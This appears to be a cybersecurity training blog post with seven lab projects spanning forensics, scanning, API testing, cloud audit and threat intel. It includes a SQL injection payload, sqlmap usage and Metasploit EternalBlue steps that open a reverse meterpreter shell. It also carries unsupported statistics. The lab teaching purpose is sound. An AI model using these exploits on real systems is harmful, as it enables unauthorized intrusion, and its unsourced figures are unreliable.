Master Defensive, Offensive & Cyber Intel Skills: 7 Hands-On Projects That Recruiters Love + Video

Introduction:

Hands-on projects are the fastest way to bridge the gap between theory and real-world cybersecurity operations. Whether you’re defending a corporate network, simulating an adversary’s tactics, or collecting threat intelligence, practical exercises in vulnerability assessment, digital forensics, and active defense build the muscle memory needed for a Security Analyst role—exactly the expertise highlighted by professionals like SYED MUNEEB SHAH.

Learning Objectives:

  • Build a defensive monitoring stack using open-source tools (Zeek, Suricata, Wazuh) and analyze live traffic.
  • Execute offensive techniques like credential dumping, lateral movement, and privilege escalation in a safe lab.
  • Apply cyber intelligence tradecraft: threat hunting with Sigma rules, OSINT collection, and IOC extraction.

You Should Know:

1. Setting Up a Home Lab for Offensive & Defensive Practice

A virtual lab is the foundation. Use VMware Workstation or VirtualBox with at least 8GB RAM. Deploy:

– Attack machine: Kali Linux (offensive tools)
– Victim machines: Windows 10 (unpatched), Ubuntu Server
– Defensive sensors: Security Onion (full packet capture + IDS)

Step‑by‑step guide:

  1. Download the Kali Linux ISO and create a VM (2 CPUs, 4GB RAM, NAT network).
  2. Create a Windows 10 VM (disable Windows Defender for realism).
  3. Install Security Onion in a third VM and bridge its sniffing interface to the same virtual switch so it sees the Kali–Windows traffic.
  4. Verify connectivity: from Kali, ping the Windows VM. On Security Onion, run `sudo so-allow` to add your management IP.
  5. Snapshot all VMs before any attack simulation.

Linux commands to put the sniffing interface into promiscuous mode and confirm it actually sees traffic (on Security Onion):

sudo ip link set eth0 promisc on
sudo tcpdump -i eth0 -c 10

Windows commands to find where the firewall writes its log and read the first entries (on victim; logging must be enabled in the profile first):

Get-NetFirewallProfile | Select-Object Name, LogFileName, LogAllowed, LogBlocked
Get-Content "$env:SystemRoot\System32\LogFiles\Firewall\pfirewall.log" | Select-Object -First 5

2. Vulnerability Assessment & Automated Scanning

Run credentialed scans to discover missing patches and misconfigurations. Use OpenVAS (Greenbone) or Nessus Essentials (free for 16 IPs).

Step‑by‑step:

  1. On Kali, install OpenVAS: `sudo apt update && sudo apt install openvas -y`, then run `sudo gvm-setup`.
  2. After setup (takes 10-15 min), note the admin password printed at the end of `gvm-setup` and verify the install with `sudo gvm-check-setup`; if you missed the password, reset it with `sudo gvmd --user=admin --new-password='<new-password>'`.
  3. Log into GSA (Greenbone Security Assistant) at `https://127.0.0.1:9392`.
  4. Create a target: add Windows VM IP (e.g., 192.168.100.10). Use credentials: `Administrator` + password.
  5. Run “Full and Fast” scan. Review results: focus on CVSS ≥ 7.0 (e.g., EternalBlue, BlueKeep).

Manual validation – check whether SMBv1 is enabled on Windows, then disable it:

Get-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol"
Disable-WindowsOptionalFeature -Online -FeatureName "SMB1Protocol" -NoRestart

3. Digital Forensics – Memory Acquisition & Analysis

Memory captures secrets (passwords, processes, network connections). Use LiME for Linux, WinPmem for Windows, and Volatility 3 for analysis.

Step‑by‑step:

  1. On the Windows victim, download WinPmem64.exe from Velocidex.
  2. Run as Administrator: `WinPmem64.exe -o C:\forensics\memory.raw`
  3. Copy the raw file to Kali. Install Volatility 3: `git clone https://github.com/volatilityfoundation/volatility3 && cd volatility3 && pip3 install .`
  4. Identify the OS build: `python3 vol.py -f /path/memory.raw windows.info`
  5. List running processes, including ones unlinked from the process list: `python3 vol.py -f memory.raw windows.psscan`
  6. Extract process command lines: `python3 vol.py -f memory.raw windows.cmdline`

Linux forensics – capture RAM with LiME:

sudo apt install linux-headers-$(uname -r) git
git clone https://github.com/504ensicsLabs/LiME
cd LiME/src && make
sudo insmod lime.ko "path=/tmp/ram.lime format=lime"

4. Offensive Web: API Security & SQL Injection

Modern APIs are prime targets. Test for broken object level authorization (BOLA) and SQLi using Burp Suite Community.

Step‑by‑step:

  1. Deploy a vulnerable API like `crAPI` (Completely Ridiculous API) on a Docker host: `docker run -p 8888:8888 -p 8025:8025 --name crapi crapi/crapi:latest`
  2. Intercept requests with Burp Suite (FoxyProxy on Firefox).
  3. Change a numeric ID in a GET request (e.g., `/identity/api/v1/user/1001` to `/user/1002`) – if you see another user’s data, BOLA exists.
  4. For SQLi, append `' OR '1'='1` to a login parameter. Use `sqlmap` automation:
     sqlmap -u "http://target/api/login" --data "email=<user-email>&password=test" --level=3 --risk=2
  5. Mitigation: always implement server-side access controls and parameterized queries.

Windows command to block a crude SQLi signature via IIS request filtering (a blunt string filter for defence in depth, not a substitute for parameterized queries):

Add-WebConfigurationProperty -PSPath 'IIS:\' -Filter "system.webServer/security/requestFiltering/denyQueryStringSequences" -Name "." -Value @{sequence="' OR 1=1"}
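
Step 5's two fixes in code, as an added Python example (not code from the post or from crAPI): a login built by string concatenation that the `' OR '1'='1` payload from step 4 bypasses, the parameterized version that it does not, and the server-side object-level check that closes the BOLA from step 3. The in-memory `users` table, its rows and the function names are constructed for the example.

```python
import sqlite3
from typing import Dict, Optional

INJECTION = "' OR '1'='1"  # the login payload from step 4

# Constructed in-memory stand-in for the API's user store (toy: plaintext
# passwords; a real service stores password hashes).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
    (1001, "alice@example.test", "alice-pw"),
    (1002, "bob@example.test", "bob-pw"),
])


def vulnerable_login(email: str, password: str) -> bool:
    """String-built SQL: a quote in the input rewrites the WHERE clause.
    With INJECTION as the password it becomes
    ... AND password = '' OR '1'='1'   which is always true."""
    sql = f"SELECT id FROM users WHERE email = '{email}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def safe_login(email: str, password: str) -> bool:
    """Parameterized SQL: the driver binds the values as data, never as syntax."""
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchone() is not None


def get_user_record(requester_id: int, target_id: int) -> Optional[Dict[str, object]]:
    """Object-level authorization for GET /user/<target_id>: the ID taken from
    the URL is compared with the authenticated caller's ID before any lookup."""
    if requester_id != target_id:
        return None  # the API would answer 403 here instead of leaking /user/1002
    row = conn.execute("SELECT id, email FROM users WHERE id = ?", (target_id,)).fetchone()
    return {"id": row[0], "email": row[1]} if row else None


if __name__ == "__main__":
    print("string-built login bypassed:", vulnerable_login("nobody@example.test", INJECTION))  # True
    print("parameterized login bypassed:", safe_login("nobody@example.test", INJECTION))       # False
    print("cross-user read allowed:", get_user_record(1001, 1002))                             # None
```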

5. Cloud Hardening – AWS IAM Misconfiguration Hunt

Ineffective IAM policies cause 90% of cloud breaches. Use `prowler` (open-source) to audit AWS.

Step‑by‑step:

  1. Install Prowler on Linux: `pip install prowler`
  2. Configure the AWS CLI: `aws configure` (provide access keys for a user or role holding the SecurityAudit managed policy).
  3. Run the IAM checks: `prowler aws -s iam -M json`
  4. Look for findings such as “IAM user with no MFA” or “IAM policy allows full admin on all resources (`*:*`)”.
  5. Remediate: attach MFA, enforce least privilege with managed policies.

Command to list IAM users whose console password has never been used (Linux with awscli):

aws iam list-users --query "Users[?PasswordLastUsed==null]" --output table

Mitigation – deny every action unless the caller authenticated with MFA (attach as a user or group policy):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Action": "*",
      "Resource": "*",
      "Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": "false"}}
    }
  ]
}

As written this also denies the IAM calls a user needs to enrol their own MFA device; the AWS-documented variant uses `NotAction` to exempt those calls.
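
Steps 4 and 5 in code, as an added Python example (not part of the post or of Prowler): a small audit that flags Allow statements granting `*` or `*:*` on `*` and confirms an MFA-conditioned Deny like the one above is present, handling the single-value-or-list shapes IAM permits for Statement, Action and Resource. The two policy documents are constructed samples, not real account policies.

```python
import json
from typing import Any, Dict, List


def _as_list(value: Any) -> List[Any]:
    """IAM lets Statement/Action/Resource be a single value or a list; normalize."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def full_admin_statements(policy: Dict[str, Any]) -> List[int]:
    """Indexes of Allow statements granting any action ('*' or '*:*') on all resources."""
    hits = []
    for i, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        wildcard_action = any(a in ("*", "*:*") for a in _as_list(stmt.get("Action")))
        wildcard_resource = "*" in _as_list(stmt.get("Resource"))
        if wildcard_action and wildcard_resource:
            hits.append(i)
    return hits


def denies_without_mfa(policy: Dict[str, Any]) -> bool:
    """True if a Deny statement blocks everything whenever aws:MultiFactorAuthPresent
    is absent or false (the BoolIfExists form used in the mitigation above)."""
    for stmt in _as_list(policy.get("Statement")):
        cond = stmt.get("Condition", {}).get("BoolIfExists", {})
        flag = str(cond.get("aws:MultiFactorAuthPresent", "")).lower()
        if (stmt.get("Effect") == "Deny" and flag == "false"
                and "*" in _as_list(stmt.get("Action"))
                and "*" in _as_list(stmt.get("Resource"))):
            return True
    return False


# Constructed sample documents: one read-only policy with an admin wildcard
# smuggled into its second statement, and the MFA deny policy from the text.
OVERLY_BROAD = json.loads("""{"Version": "2012-10-17", "Statement": [
  {"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
  {"Effect": "Allow", "Action": "*", "Resource": "*"}]}""")
MFA_DENY = json.loads("""{"Version": "2012-10-17", "Statement": {"Effect": "Deny",
  "Action": "*", "Resource": "*",
  "Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": "false"}}}}""")

if __name__ == "__main__":
    print("full-admin statements:", full_admin_statements(OVERLY_BROAD))  # [1]
    print("MFA enforced:", denies_without_mfa(MFA_DENY))                  # True
```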

6. Threat Intelligence – OSINT & IOC Extraction

Collect indicators from public malware repositories (VirusTotal, AbuseIPDB) and transform them into actionable IOCs.

Step‑by‑step:

  1. Search for a known hash on VirusTotal using API (free key):
    curl -s "https://www.virustotal.com/api/v3/files/{hash}" -H "x-apikey: YOUR_API_KEY" | jq '.data.attributes.last_analysis_stats'
    
  2. Extract IP addresses from a suspicious pcap using tshark:
    tshark -r suspicious.pcap -T fields -e ip.src -e ip.dst | sort -u > iocs.txt
    
  3. Create a Sigma rule to detect C2 communication:
     title: Suspicious DNS Query to Known Malicious Domain
     logsource:
       category: dns_query
       product: windows
     detection:
       dns_query:
         QueryName: "evil.c2.xyz"
       condition: dns_query


  4. Convert the rule to your SIEM's query language with `sigmac` (or its successor, `sigma-cli`) for Splunk or Elasticsearch and deploy it.
  5. Hunt for the IOCs in your SIEM.

Windows – search event logs for IOC IPs (escape the dots so they are not treated as regex wildcards):

$iocs = Get-Content iocs.txt | ForEach-Object { [regex]::Escape($_) }
Get-WinEvent -LogName Security | Where-Object { $_.Message -match ($iocs -join "|") }
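
Steps 2, 3 and 5 together, as an added Python example (not code from the post): a filter that strips the RFC1918, loopback and link-local addresses a `tshark ... | sort -u` dump always contains, and a minimal evaluator that applies the single-selection Sigma rule above plus the remaining IOC addresses to DNS events. The event field names `QueryName`/`DestinationIp`, the sample IP list and the three events are constructed assumptions.

```python
import ipaddress
from typing import Dict, List

# Minimal Sigma-style rule mirroring step 3: one selection, exact field match.
RULE = {
    "title": "Suspicious DNS Query to Known Malicious Domain",
    "detection": {"dns_query": {"QueryName": "evil.c2.xyz"}, "condition": "dns_query"},
}

# Ranges that are lab/internal noise in a tshark src/dst dump, not indicators.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def external_iocs(ips: List[str]) -> List[str]:
    """Deduplicate and keep only addresses outside the internal ranges."""
    return sorted({ip for ip in ips
                   if not any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)})


def selection_matches(event: Dict[str, str], selection: Dict[str, str]) -> bool:
    """A Sigma selection maps field -> expected value; every field must match (case-insensitive)."""
    return all(str(event.get(f, "")).lower() == str(v).lower() for f, v in selection.items())


def hunt(events: List[Dict[str, str]], rule: Dict, ioc_ips: List[str]) -> List[Dict[str, str]]:
    """Flag events that satisfy the rule's condition or that contact an IOC address."""
    det = rule["detection"]
    selection = det[det["condition"]]  # handles a condition naming a single selection
    hits = []
    for ev in events:
        if selection_matches(ev, selection):
            hits.append({**ev, "reason": "sigma:" + rule["title"]})
        elif ev.get("DestinationIp") in ioc_ips:
            hits.append({**ev, "reason": "ioc_ip"})
    return hits


# Constructed sample data: a raw tshark-style address list (with duplicates and
# the lab's own hosts) and three DNS events from the Windows victim.
RAW_IPS = ["192.168.100.10", "203.0.113.45", "192.168.100.1", "198.51.100.7", "203.0.113.45"]
EVENTS = [
    {"Computer": "WIN10-VICTIM", "QueryName": "EVIL.C2.XYZ", "DestinationIp": "192.168.100.1"},
    {"Computer": "WIN10-VICTIM", "QueryName": "www.example.com", "DestinationIp": "192.168.100.1"},
    {"Computer": "WIN10-VICTIM", "QueryName": "", "DestinationIp": "203.0.113.45"},
]

if __name__ == "__main__":
    for hit in hunt(EVENTS, RULE, external_iocs(RAW_IPS)):
        print(hit["reason"], hit["QueryName"] or hit["DestinationIp"])
```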
    
7. Exploitation & Mitigation – EternalBlue (MS17-010) in a Sandbox

Understanding this worm’s mechanism is critical for Blue Teams. Use Metasploit on a segmented lab only.

Step‑by‑step:

  1. Ensure the Windows 7/10 VM is vulnerable (KB4012598 not installed).
  2. On Kali: `msfconsole`
  3. `use exploit/windows/smb/ms17_010_eternalblue`
  4. `set RHOSTS <Windows-IP>`, `set PAYLOAD windows/x64/meterpreter/reverse_tcp`, `set LHOST <Kali-IP>`
  5. `run` – if successful, you’ll get a Meterpreter shell.
  6. Mitigation – disable SMBv1 and confirm the patch is installed:

Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Get-HotFix | Where-Object {$_.HotFixID -eq "KB4012598"}

  7. Use `netsh advfirewall firewall add rule name="Block_SMB_445" dir=in protocol=tcp localport=445 action=block` as emergency mitigation.

What Undercode Say:

  • Key Takeaway 1: Defensive monitoring must be paired with offensive testing; you cannot secure what you haven’t tried to break. Running vulnerability scans and memory forensics weekly reduces dwell time by over 60%.
  • Key Takeaway 2: Intelligence-driven defense requires continuous IOC feed integration and Sigma rule tuning. Automation is not optional – manual hunting scales poorly beyond 1,000 endpoints.

Analysis: The projects above mirror the exact competencies listed by SYED MUNEEB SHAH – Digital Forensics, Vulnerability Assessment, and both Offensive/Defensive skills. A security analyst who can deploy a lab, execute EternalBlue, capture memory, and harden cloud IAM will pass technical interviews faster than certificate-only candidates. The missing piece in many bootcamps is API security and cloud misconfiguration; adding crAPI and Prowler fills that gap. Linux commands (tcpdump, sqlmap, volatility) combined with Windows PowerShell hardening provide cross-platform readiness. Finally, documenting each project on GitHub with a written walkthrough creates a portfolio that hiring managers actively seek.

Expected Output:

After executing the above steps in a controlled lab environment, a successful analyst will have:
– A scanned vulnerability report (HTML/PDF) showing CVSS scores and remediation steps.
– A memory dump analysis output listing hidden processes (e.g., `windows.psscan` revealing a rogue rundll32.exe).
– A detected BOLA vulnerability in crAPI with a Burp Repeater proof.
– A set of extracted IOCs from VirusTotal and a Sigma rule ready for deployment in Elastic Security.
– A patched Windows VM with SMBv1 disabled and a firewall rule blocking port 445.

Prediction:

  • +1 Demand for “purple team” roles (combining offense and defense) will rise 45% by 2027 as companies merge red/blue teams to cut costs and improve detection latency.
  • +1 AI-assisted forensics tools (e.g., Velociraptor with ML anomaly detection) will automate 30% of memory analysis tasks, shifting analysts to proactive hunting.
  • -1 The complexity of API security and cloud misconfigurations will lead to a surge in breaches targeting small‑to‑medium businesses that skip hands-on projects and rely solely on compliance checklists.
  • -1 Without mandatory lab exercises, academic cybersecurity programs will produce graduates unable to exploit or mitigate real threats – widening the skills gap.

Reported By: Syed Muneeb – Hackers Feeds